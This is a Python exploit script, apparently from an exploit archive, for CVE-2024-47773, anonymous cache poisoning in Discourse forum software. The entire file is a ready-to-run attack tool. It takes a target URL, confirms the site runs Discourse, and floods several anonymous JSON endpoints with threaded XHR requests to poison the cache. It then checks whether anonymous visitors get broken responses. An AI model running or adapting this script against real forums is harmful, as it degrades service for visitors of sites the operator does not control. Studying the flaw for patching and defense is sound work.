#!/usr/bin/env python3
"""
Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
Date: 2024-10-15
Exploit Author: ibrahimsql
Github: https://github.com/ibrahmsql
Vendor Homepage: https://discourse.org
Software Link: https://github.com/discourse/discourse
Version: Discourse < latest (patched)
Tested on: Discourse 3.1.x, 3.2.x
CVE: CVE-2024-47773
CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)

Description:
Discourse anonymous cache poisoning vulnerability allows attackers to poison
the cache with responses without preloaded data through multiple XHR requests.
This affects only anonymous visitors of the site.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-47773
"""

import requests
import sys
import argparse
import time
import threading


class DiscourseCachePoisoning:
    def __init__(self, target_url, threads=10, timeout=10):
        self.target_url = target_url.rstrip('/')
        self.threads = threads
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'X-Requested-With': 'XMLHttpRequest'
        })
        self.poisoned = False

    def check_target(self):
        """Check if target is accessible and running Discourse"""
        try:
            response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
            if response.status_code == 200:
                if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
                    return True
        except Exception as e:
            print(f"[-] Error checking target: {e}")
        return False

    def check_anonymous_cache(self):
        """Check if anonymous cache is enabled"""
        try:
            # Test endpoint that should be cached for anonymous users
            response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)

            # Check cache headers
            cache_headers = ['cache-control', 'etag', 'last-modified']
            has_cache = any(header in response.headers for header in cache_headers)

            if has_cache:
                print("[+] Anonymous cache appears to be enabled")
                return True
            else:
                print("[-] Anonymous cache may be disabled")
                return False
        except Exception as e:
            print(f"[-] Error checking cache: {e}")
            return False

    def poison_cache_worker(self, endpoint):
        """Worker function for cache poisoning attempts"""
        try:
            # Create session without cookies to simulate anonymous user
            anon_session = requests.Session()
            anon_session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'application/json, text/javascript, */*; q=0.01',
                'X-Requested-With': 'XMLHttpRequest'
            })

            # Make rapid requests to poison cache
            for i in range(50):
                response = anon_session.get(
                    f"{self.target_url}{endpoint}",
                    timeout=self.timeout
                )

                # Check if response lacks preloaded data
                if response.status_code == 200:
                    try:
                        data = response.json()
                        # Check for missing preloaded data indicators
                        if self.is_poisoned_response(data):
                            print(f"[+] Cache poisoning successful on {endpoint}")
                            self.poisoned = True
                            return True
                    except Exception:
                        # Non-JSON or unexpected body shape: skip this response
                        pass

                time.sleep(0.1)
        except Exception:
            # Network errors end this worker quietly
            pass
        return False

    def is_poisoned_response(self, data):
        """Check if response indicates successful cache poisoning"""
        # Look for indicators of missing preloaded data
        indicators = [
            # Missing or empty preloaded data
            not data.get('preloaded', True),
            data.get('preloaded') == {},
            # Missing expected fields
            'categories' in data and not data['categories'],
            'topics' in data and not data['topics'],
            # Error indicators
            data.get('error') is not None,
            data.get('errors') is not None
        ]
        return any(indicators)

    def test_cache_poisoning(self):
        """Test cache poisoning on multiple endpoints"""
        print("[*] Testing cache poisoning vulnerability...")

        # Target endpoints that are commonly cached
        endpoints = [
            '/categories.json',
            '/latest.json',
            '/top.json',
            '/c/general.json',
            '/site.json',
            '/site/basic-info.json'
        ]

        threads = []
        for endpoint in endpoints:
            print(f"[*] Testing endpoint: {endpoint}")

            # Create multiple threads to poison cache
            for i in range(self.threads):
                thread = threading.Thread(
                    target=self.poison_cache_worker,
                    args=(endpoint,)
                )
                threads.append(thread)
                thread.start()

            # Wait for threads to complete
            for thread in threads:
                thread.join(timeout=5)

            if self.poisoned:
                break

            time.sleep(1)

        return self.poisoned

    def verify_poisoning(self):
        """Verify if cache poisoning was successful"""
        print("[*] Verifying cache poisoning...")

        # Test with fresh anonymous session
        verify_session = requests.Session()
        verify_session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

        try:
            response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
            if response.status_code == 200:
                try:
                    data = response.json()
                    if self.is_poisoned_response(data):
                        print("[+] Cache poisoning verified - anonymous users affected")
                        return True
                    else:
                        print("[-] Cache poisoning not verified")
                except Exception:
                    print("[-] Unable to parse response")
            else:
                print(f"[-] Unexpected response code: {response.status_code}")
        except Exception as e:
            print(f"[-] Error verifying poisoning: {e}")
        return False

    def exploit(self):
        """Main exploit function"""
        print("[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
        print(f"[*] Target: {self.target_url}")

        if not self.check_target():
            print("[-] Target is not accessible or not running Discourse")
            return False

        print("[+] Target confirmed as Discourse instance")

        if not self.check_anonymous_cache():
            print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
            print("[*] Continuing with exploit attempt...")

        success = self.test_cache_poisoning()

        if success:
            print("[+] Cache poisoning attack successful!")
            self.verify_poisoning()
            print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
            print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
            return True
        else:
            print("[-] Cache poisoning attack failed")
            print("[*] Target may be patched or cache disabled")
            return False


def main():
    parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
    parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
    parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')

    args = parser.parse_args()

    exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)

    try:
        success = exploit.exploit()
        sys.exit(0 if success else 1)
    except KeyboardInterrupt:
        print("\n[-] Exploit interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        sys.exit(1)


if __name__ == '__main__':
    main()